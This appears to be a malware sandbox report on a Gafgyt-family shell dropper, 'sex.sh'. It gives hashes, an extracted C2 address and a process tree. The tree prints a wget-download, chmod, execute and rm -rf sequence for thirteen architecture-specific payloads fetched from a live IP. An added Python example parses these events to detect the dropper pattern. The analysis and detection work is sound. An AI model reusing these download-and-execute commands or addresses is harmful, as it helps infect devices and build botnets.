Analysis
- max time kernel: 13s
- max time network: 15s
- platform: debian-9_mips
- resource: debian9-mipsbe-20240611-en
- resource tags: arch:mips, image:debian9-mipsbe-20240611-en, kernel:4.9.0-13-4kc-malta, locale:en-us, os:debian-9-mips, system
- submitted: 04/08/2024, 13:39
Static task: static1
Behavioral task behavioral1: sample sex.sh, resource ubuntu1804-amd64-20240611-en
Behavioral task behavioral2: sample sex.sh, resource debian9-armhf-20240611-en
Behavioral task behavioral3: sample sex.sh, resource debian9-mipsbe-20240611-en
General
- Target: sex.sh
- Size: 1KB
- MD5: 4a5211253d90ad66dea73ffa8809bbd8
- SHA1: 27c91298804fd2e46e280d4259170e6a48e4280d
- SHA256: bee780a07d3c76bc39ab97f88050339da7c3231987c32e14aca61515d7a0c276
- SHA512: a844fe1fdd89254ff069b0bc3fa3b5812936f9560f693cd6c5658f4232f42efc9e926a3d51bd152a16283c8ab322967f6f7686f536ea395047477661b9aad0eb
Malware Config
Extracted
- family: gafgyt
- C2: 5.252.177.70:23
Signatures
- Detected Gafgyt variant (1 IoC)
  resource: behavioral3/files/fstream-1.dat; yara rule: family_gafgyt
- Executes dropped EXE (1 IoC)
  ioc: /tmp/arm61; PID 755; process: arm61
- Writes file to tmp directory (1 IoC)
  Malware often drops required files in the /tmp directory.
  description: File opened for modification; ioc: /tmp/arm61; process: wget
Processes
- /tmp/sex.sh: /tmp/sex.sh (PID 710)
  - /usr/bin/wget: wget http://216.172.177.16/mips (PID 714)
  - /bin/chmod: chmod +x mips (PID 732)
  - /tmp/mips: ./mips (PID 734)
  - /bin/rm: rm -rf mips (PID 735)
  - /usr/bin/wget: wget http://216.172.177.16/mipsel (PID 736)
  - /bin/chmod: chmod +x mipsel (PID 741)
  - /tmp/mipsel: ./mipsel (PID 743)
  - /bin/rm: rm -rf mipsel (PID 744)
  - /usr/bin/wget: wget http://216.172.177.16/sh4 (PID 745)
  - /bin/chmod: chmod +x sh4 (PID 746)
  - /tmp/sh4: ./sh4 (PID 747)
  - /bin/rm: rm -rf sh4 (PID 748)
  - /usr/bin/wget: wget http://216.172.177.16/x86 (PID 749)
  - /bin/chmod: chmod +x x86 (PID 750)
  - /tmp/x86: ./x86 (PID 751)
  - /bin/rm: rm -rf x86 (PID 752)
  - /usr/bin/wget: wget http://216.172.177.16/arm61 (PID 753) [Writes file to tmp directory]
  - /bin/chmod: chmod +x arm61 (PID 754)
  - /tmp/arm61: ./arm61 (PID 755) [Executes dropped EXE]
  - /bin/rm: rm -rf arm61 (PID 757)
  - /usr/bin/wget: wget http://216.172.177.16/i686 (PID 758)
  - /bin/chmod: chmod +x i686 (PID 759)
  - /tmp/i686: ./i686 (PID 760)
  - /bin/rm: rm -rf i686 (PID 761)
  - /usr/bin/wget: wget http://216.172.177.16/ppc (PID 762)
  - /bin/chmod: chmod +x ppc (PID 763)
  - /tmp/ppc: ./ppc (PID 764)
  - /bin/rm: rm -rf ppc (PID 765)
  - /usr/bin/wget: wget http://216.172.177.16/586 (PID 766)
  - /bin/chmod: chmod +x 586 (PID 767)
  - /tmp/586: ./586 (PID 768)
  - /bin/rm: rm -rf 586 (PID 769)
  - /usr/bin/wget: wget http://216.172.177.16/m68k (PID 770)
  - /bin/chmod: chmod +x m68k (PID 771)
  - /tmp/m68k: ./m68k (PID 772)
  - /bin/rm: rm -rf m68k (PID 773)
  - /usr/bin/wget: wget http://216.172.177.16/dc (PID 774)
  - /bin/chmod: chmod +x dc (PID 781)
  - /tmp/dc: ./dc (PID 782)
  - /bin/rm: rm -rf dc (PID 783)
  - /usr/bin/wget: wget http://216.172.177.16/dss (PID 785)
  - /bin/chmod: chmod +x dss (PID 792)
  - /tmp/dss: ./dss (PID 794)
  - /bin/rm: rm -rf dss (PID 795)
  - /usr/bin/wget: wget http://216.172.177.16/co (PID 796)
  - /bin/chmod: chmod +x co (PID 803)
  - /tmp/co: ./co (PID 805)
  - /bin/rm: rm -rf co (PID 807)
  - /usr/bin/wget: wget http://216.172.177.16/scar (PID 808)
  - /bin/chmod: chmod +x scar (PID 815)
  - /tmp/scar: ./scar (PID 817)
  - /bin/rm: rm -rf scar (PID 819)
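The process tree above is the entire dropper: for each of thirteen architecture-named payloads it runs wget, chmod +x, the binary itself, then rm -rf, all from the working directory /tmp and all fetched from a single host (216.172.177.16), while the extracted config points at a different address for C2. The Python below is an added example, not part of the sandbox report or of the sample; it reconstructs that download/chmod/exec/delete chain per payload from process events transcribed from the tree (three of the thirteen payloads, plus one constructed negative case that is not in the report) and flags the multi-architecture dropper pattern. The event tuple layout, the function names and the min_chains threshold are my own assumptions, not anything the sandbox defines.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# (pid, program, command line) transcribed from the sandbox process tree above.
# Only mips, mipsel and arm61 are reproduced; the logic is identical for the other
# ten payloads.  The last event is CONSTRUCTED (not in the report): a download that
# is never chmod'ed, executed or deleted, so it must not count as a complete chain.
EVENTS = [
    (710, "/tmp/sex.sh", "/tmp/sex.sh"),
    (714, "/usr/bin/wget", "wget http://216.172.177.16/mips"),
    (732, "/bin/chmod", "chmod +x mips"),
    (734, "/tmp/mips", "./mips"),
    (735, "/bin/rm", "rm -rf mips"),
    (736, "/usr/bin/wget", "wget http://216.172.177.16/mipsel"),
    (741, "/bin/chmod", "chmod +x mipsel"),
    (743, "/tmp/mipsel", "./mipsel"),
    (744, "/bin/rm", "rm -rf mipsel"),
    (753, "/usr/bin/wget", "wget http://216.172.177.16/arm61"),
    (754, "/bin/chmod", "chmod +x arm61"),
    (755, "/tmp/arm61", "./arm61"),
    (757, "/bin/rm", "rm -rf arm61"),
    (900, "/usr/bin/wget", "wget http://216.172.177.16/README"),  # constructed
]

WGET_RE = re.compile(r"^wget\s+(\S+)")
CHMOD_RE = re.compile(r"^chmod\s+\+x\s+(\S+)")
EXEC_RE = re.compile(r"^\./(\S+)")          # "./name" run from the drop directory
RM_RE = re.compile(r"^rm\s+-rf\s+(\S+)")

# The order the dropper uses for every payload; a chain is "complete" only when
# all four stages were seen for the same file name, in this order.
FULL_CHAIN = ["download", "chmod", "exec", "delete"]


@dataclass
class Chain:
    """Lifecycle of one payload name through download -> chmod -> exec -> delete."""
    name: str
    url: str = ""        # URL the payload was fetched from
    exec_path: str = ""  # absolute path of the process image when it was executed
    stages: list = field(default_factory=list)

    def complete(self) -> bool:
        return self.stages == FULL_CHAIN


def build_chains(events):
    """Group process events by payload file name and record which stages occurred."""
    chains = {}

    def mark(name, stage):
        chain = chains.setdefault(name, Chain(name))
        chain.stages.append(stage)
        return chain

    for _pid, prog, cmd in events:
        if m := WGET_RE.match(cmd):
            url = m.group(1)
            mark(url.rsplit("/", 1)[-1], "download").url = url
        elif m := CHMOD_RE.match(cmd):
            mark(m.group(1), "chmod")
        elif m := EXEC_RE.match(cmd):
            mark(m.group(1), "exec").exec_path = prog
        elif m := RM_RE.match(cmd):
            mark(m.group(1), "delete")
    return chains


def download_hosts(chains):
    """Distinct hosts the payloads were fetched from (the dropper uses exactly one)."""
    return sorted({urlparse(c.url).hostname for c in chains.values() if c.url})


def complete_chains(chains):
    return [c.name for c in chains.values() if c.complete()]


def tmp_executions(chains):
    """Payloads that were executed out of /tmp (the 'Executes dropped EXE' signal)."""
    return [c.name for c in chains.values() if c.exec_path.startswith("/tmp/")]


def is_multi_arch_dropper(events, min_chains=2):
    """Flag the Gafgyt-style pattern: several complete download/chmod/exec/delete
    chains, all pulled from a single host.  min_chains is an assumed threshold."""
    chains = build_chains(events)
    return (len(complete_chains(chains)) >= min_chains
            and len(download_hosts(chains)) == 1)


if __name__ == "__main__":
    chains = build_chains(EVENTS)
    for c in chains.values():
        state = "COMPLETE" if c.complete() else "partial"
        print(f"{c.name:8} {'/'.join(c.stages):32} {state}")
    print("download hosts:", download_hosts(chains))
    print("dropper pattern:", is_multi_arch_dropper(EVENTS))
```

On real telemetry the same (pid, program, cmdline) tuples come from auditd execve records or an eBPF exec tracer; the chain keyed on file name survives the rm -rf, which is the point, since by the time a scanner looks in /tmp the binaries are gone and only the running process (here /tmp/arm61, PID 755) remains. A chain that downloads and executes without the delete is still worth an alert, and the constructed README case shows that a bare download is not flagged on its own.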
Network
MITRE ATT&CK Matrix
Downloads
- Filesize: 136KB
- MD5: 6820e48a7c8f9b287da8f0593b0a8f83
- SHA1: 4e5dc35c941c1d13cd9dcbcf5df2a6d5e254911f
- SHA256: eb052830d4b1f9ab763bc4febbd94207d10f39b5e8b456a092fb733e9168d811
- SHA512: 0dd5236a98a9a05087442d3bbe0c8185712b295288be41ccb815965607d90bfef2943f2b488dd76260959895831986397907408850d719808cd1cc30dba63d1c